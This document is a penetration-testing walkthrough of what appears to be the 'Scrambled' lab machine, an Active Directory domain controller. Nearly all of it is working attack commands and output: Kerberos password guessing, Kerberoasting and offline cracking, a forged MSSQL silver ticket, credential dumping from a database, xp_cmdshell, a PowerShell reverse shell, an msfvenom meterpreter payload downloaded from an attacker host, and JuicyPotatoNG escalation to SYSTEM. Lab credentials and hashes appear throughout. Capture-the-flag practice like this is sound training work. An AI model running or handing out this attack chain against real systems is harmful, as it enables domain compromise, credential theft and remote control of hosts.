
Scrambled

Open ports from the nmap scan:
53,80,88,135,139,389,445,464,593,636,1433,3268,3269,4411,5985,9389,49667,49675,49676,49688,49755,64811
echo "10.129.75.146 scrm.local dc1.scrm.local" >> /etc/hosts
Anonymous SMB enumeration failed.
GetNPUsers.py (AS-REP roasting) failed.
LDAP scan (the RootDSE confirms the domain scrm.local and the DC DC1):
nmap -n -sV --script "ldap* and not brute" 10.129.75.146
| supportedCapabilities: 1.2.840.113556.1.4.2237
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=scrm,DC=local
| serverName: CN=DC1,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=scrm,DC=local
| schemaNamingContext: CN=Schema,CN=Configuration,DC=scrm,DC=local
| namingContexts: DC=scrm,DC=local
| namingContexts: CN=Configuration,DC=scrm,DC=local
| namingContexts: CN=Schema,CN=Configuration,DC=scrm,DC=local
| namingContexts: DC=DomainDnsZones,DC=scrm,DC=local
| namingContexts: DC=ForestDnsZones,DC=scrm,DC=local
| isSynchronized: TRUE
| highestCommittedUSN: 290979
| dsServiceName: CN=NTDS Settings,CN=DC1,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=scrm,DC=local
| dnsHostName: DC1.scrm.local
| defaultNamingContext: DC=scrm,DC=local
| currentTime: 20240214162425.0Z
|_ configurationNamingContext: CN=Configuration,DC=scrm,DC=local
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows
ldapsearch (anonymous bind) failed.
MS-SQL NSE scripts against port 1433:
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.129.75.146
Nothing useful returned.
Connecting to port 4411 returns a custom service banner:
SCRAMBLECORP_ORDERS_V1.0.3
A Google search for this banner turns up nothing useful.
On port 80 the website gives away a username: ksimpson
Try kerbrute against this single user:
/root/Desktop/Tool/kerbrute_linux_amd64 bruteuser ./pass ksimpson -d scrm.local --dc dc.scrm.local -v
2024/02/15 13:13:33 > [+] VALID LOGIN: ksimpson@scrm.local:ksimpson
The password is the username: ksimpson:ksimpson
NTLM authentication is disabled on this host, so every Impacket tool has to authenticate over Kerberos (-k -no-pass). Request a TGT for ksimpson first (this is a TGT, not a silver ticket; the silver ticket comes later, once the service account hash is known):
getTGT.py scrm.local/ksimpson:ksimpson
export KRB5CCNAME=~/Desktop/scrambled/ksimpson.ccache
psexec.py scrm.local/ksimpson@10.129.75.146 -k -no-pass
psexec.py fails with a pre-authentication error.
python3 smbexec.py -k -no-pass dc1.scrm.local -target-ip 10.129.75.146
Kerberos is sensitive to clock skew, so sync the attacking host's clock with the DC before retrying (the Kali clock was about 24 s off):
ntpdate scrm.local
2024-02-15 14:14:38.10018 (+0800) -24.299402 +/- 0.210894 scrm.local 10.129.75.146 s1 no-leap
CLOCK: time stepped by -24.299402
smbclient.py -k scrm.local/ksimpson@dc1.scrm.local -no-pass
With the clock synced, the connection now succeeds. The share contains a PDF file; download it and open it.
Kerberoast: request service tickets for every account with a registered SPN.
GetUserSPNs.py -request -dc-ip dc1.scrm.local scrm.local/ksimpson -dc-host dc1.scrm.local -k -no-pass
Impacket v0.11.0 - Copyright 2023 Fortra

ServicePrincipalName          Name    MemberOf  PasswordLastSet             LastLogon                   Delegation
----------------------------  ------  --------  --------------------------  --------------------------  ----------
MSSQLSvc/dc1.scrm.local:1433  sqlsvc            2021-11-04 00:32:02.351452  2024-02-14 23:27:06.326299
MSSQLSvc/dc1.scrm.local       sqlsvc            2021-11-04 00:32:02.351452  2024-02-14 23:27:06.326299

$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$32ba5bdae17d20dc632c98fddb1cf28e$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
This returns the sqlsvc account and its TGS-REP hash (etype 23, RC4-HMAC), which can be cracked offline.
Crack the hash with hashcat (mode 13100). Note that --show only prints matches already in the potfile, so the actual cracking run happened before this command:
hashcat -m 13100 hash /usr/share/wordlists/rockyou.txt --show
$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$32ba5bdae17d20dc632c98fddb1cf28e$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:Pegasus60
sqlsvc:Pegasus60
Generate the NT hash of the password (MD4 over the UTF-16LE encoding of Pegasus60); this is the key the MSSQL service tickets are encrypted with:
B999A16500B87D17EC7F2E2A68778F05
Find the domain SID (needed to forge a ticket). A first attempt with getPac.py fails with a pre-authentication error (note the target user is also misspelled here, svcsql instead of sqlsvc):
getPac.py -targetUser svcsql -hashes aad3b435b51404eeaad3b435b51404ee:B999A16500B87D17EC7F2E2A68778F05 scrm.local/ksimpson:ksimpson@10.129.75.146
Impacket v0.11.0 - Copyright 2023 Fortra

[-] Kerberos SessionError: KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid)
secretsdump.py with -debug prints the domain SID instead:
secretsdump.py -k scrm.local/ksimpson@dc1.scrm.local -no-pass -debug
S-1-5-21-2743207045-1827831105-2542523200
Forge a silver ticket for the MSSQL service with ticketer.py, using the sqlsvc NT hash, the domain SID and RID 500 (Administrator). Two variants were tried; the second one uses the SPN that is actually registered on sqlsvc (MSSQLSvc/dc1.scrm.local), which is the SPN the client will request:
ticketer.py -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -user-id 500 -domain scrm.local -spn MSSQLSVC/scrm.local Administrator
ticketer.py -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -spn MSSQLSvc/dc1.scrm.local -user-id 500 Administrator
export KRB5CCNAME=~/Desktop/scrambled/Administrator.ccache
mssqlclient.py -k -no-pass dc1.scrm.local
List the user tables, then dump the one with stored credentials:
SELECT * FROM SYSOBJECTS WHERE xtype= 'U';
SQL (SCRM\administrator  dbo@ScrambleHR)> SELECT * FROM UserImport
LdapUser   LdapPwd             LdapDomain   RefreshInterval   IncludeGroups
--------   -----------------   ----------   ---------------   -------------
MiscSvc    ScrambledEggs9900   scrm.local                90               0
Enable xp_cmdshell for command execution:
SQL (SCRM\administrator  dbo@master)> enable_xp_cmdshell
[*] INFO(DC1): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(DC1): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (SCRM\administrator  dbo@master)> xp_cmdshell whoami
output
-----------
scrm\sqlsvc
NULL
xp_cmdshell runs in the context of the SQL Server service account (sqlsvc), not as the forged Administrator, which is why the shell lands as scrm\sqlsvc.
Start a reverse shell through xp_cmdshell with a base64-encoded PowerShell one-liner:
xp_cmdshell powershell -e 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
In the resulting shell, SeImpersonatePrivilege is enabled, so a Potato-style escalation (JuicyPotatoNG) can be used.
Build the payload:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.17 LPORT=3333 -f exe -o reverse.exe
Make a .bat file rev.bat that just runs it:
c:\programdata\r1.exe
Download everything to the target (curl here is the PowerShell alias for Invoke-WebRequest, hence -outfile):
curl 10.10.16.17:8000/reverse.exe -outfile C:\programdata\r1.exe
curl 10.10.16.17:8000/rev.bat -outfile C:\programdata\rev.bat
curl 10.10.16.17:8000/JuicyPotatoNG.exe -outfile C:\programdata\jp.exe
Run JuicyPotatoNG with the .bat as the program to launch; the meterpreter callback arrives as SYSTEM:
C:\programdata\jp.exe -t * -p C:\programdata\rev.bat